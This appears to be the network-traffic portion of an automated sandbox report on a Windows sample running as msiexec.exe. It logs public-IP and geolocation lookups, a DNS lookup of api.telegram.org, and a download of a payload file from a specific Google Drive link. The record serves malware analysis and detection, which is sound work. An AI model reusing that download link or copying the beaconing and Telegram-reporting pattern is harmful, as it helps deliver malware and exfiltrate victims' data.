Oct 24, 2024 12:03:21.099534988 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:21.099534988 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.099534988 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.099534988 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.099534988 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.099534988 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.109612942 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:21.109612942 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.109612942 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.109612942 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.109612942 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.109612942 CEST | 8.8.8.8 | 192.168.2.22 | 0xbf82 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.998722076 CEST | 8.8.8.8 | 192.168.2.22 | 0x5ab7 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:21.998722076 CEST | 8.8.8.8 | 192.168.2.22 | 0x5ab7 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.783020020 CEST | 8.8.8.8 | 192.168.2.22 | 0x992f | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:22.783020020 CEST | 8.8.8.8 | 192.168.2.22 | 0x992f | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.783020020 CEST | 8.8.8.8 | 192.168.2.22 | 0x992f | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.783020020 CEST | 8.8.8.8 | 192.168.2.22 | 0x992f | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.783020020 CEST | 8.8.8.8 | 192.168.2.22 | 0x992f | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.783020020 CEST | 8.8.8.8 | 192.168.2.22 | 0x992f | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.794996977 CEST | 8.8.8.8 | 192.168.2.22 | 0xa66a | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 12:03:22.794996977 CEST | 8.8.8.8 | 192.168.2.22 | 0xa66a | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.794996977 CEST | 8.8.8.8 | 192.168.2.22 | 0xa66a | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.794996977 CEST | 8.8.8.8 | 192.168.2.22 | 0xa66a | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.794996977 CEST | 8.8.8.8 | 192.168.2.22 | 0xa66a | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:22.794996977 CEST | 8.8.8.8 | 192.168.2.22 | 0xa66a | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:23.478737116 CEST | 8.8.8.8 | 192.168.2.22 | 0xfbf | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:23.478737116 CEST | 8.8.8.8 | 192.168.2.22 | 0xfbf | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 12:03:24.293239117 CEST | 8.8.8.8 | 192.168.2.22 | 0xa178 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • reallyfreegeoip.org
                                                                                              • api.telegram.org
                                                                                              • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 193.122.130.0 | 80 | 2504 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:03:08.738343954 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 24, 2024 12:03:09.399804115 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:09 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 50c8f51ef814c227c07b8913dd366877
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 12:03:09.412684917 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Oct 24, 2024 12:03:09.570429087 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:09 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 0cf25e4150b83859a4fec54309de4212
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:09.780051947 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:09 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 0cf25e4150b83859a4fec54309de4212
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:10.559598923 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Oct 24, 2024 12:03:10.741102934 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:10 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 682899a9c3b464f6df0865ab2bd2dcd0
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
                                                                                              Oct 24, 2024 12:03:10.952076912 CEST323INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:10 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 682899a9c3b464f6df0865ab2bd2dcd0
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49167 | 132.226.8.169 | 80 | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:03:11.569566011 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Oct 24, 2024 12:03:12.638803959 CEST | 275 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:12 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 12:03:12.849598885 CEST | 275 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:12 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49169 | 132.226.247.73 | 80 | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:03:13.462949991 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 24, 2024 12:03:14.334742069 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:14 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: d1181754a9f33e6d3c42c0ce32a40c4e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 12:03:14.544008017 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:14 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: d1181754a9f33e6d3c42c0ce32a40c4e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49171 | 132.226.247.73 | 80 | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:03:15.807598114 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 24, 2024 12:03:16.661395073 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:16 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 8f799886e611909c812942812c6a9e16
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 12:03:16.869441986 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:16 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 8f799886e611909c812942812c6a9e16
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49173 | 132.226.247.73 | 80 | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:03:17.462455988 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 24, 2024 12:03:18.342772961 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:18 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: ca3ffcb9848ab85a966a8fc167b73760
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 12:03:18.552324057 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:18 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: ca3ffcb9848ab85a966a8fc167b73760
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49175 | 193.122.130.0 | 80 | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:03:19.267075062 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 24, 2024 12:03:19.920361996 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:19 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 3958074e240bc16ff7f43bcf0b8749ff
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49177 | 132.226.247.73 | 80 | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 12:03:21.117177963 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Oct 24, 2024 12:03:21.980623960 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:21 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 20ade64835a3f442f43ce209fc90f640
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>
Oct 24, 2024 12:03:22.188254118 CEST | 323 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 10:03:21 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 20ade64835a3f442f43ce209fc90f640
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.2249179193.122.130.0802504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 12:03:22.806312084 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                               Oct 24, 2024 12:03:23.459506035 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:23 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 106
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 3f9dd7fe586357413bba6fe77d94a652
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               0 | 192.168.2.22 | 49162 | 142.250.186.142 | 443 | 2504 | C:\Windows\SysWOW64\msiexec.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               2024-10-24 10:03:03 UTC | 216 | OUT | GET /uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                               2024-10-24 10:03:03 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 24 Oct 2024 10:03:03 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-lx5qCDiX1sJH5qpUFOMDFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               1 | 192.168.2.22 | 49163 | 142.250.186.97 | 443 | 2504 | C:\Windows\SysWOW64\msiexec.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               2024-10-24 10:03:04 UTC | 258 | OUT | GET /download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                               2024-10-24 10:03:06 UTC | 4917 | IN | HTTP/1.1 200 OK
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="DGABECTh192.bin"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
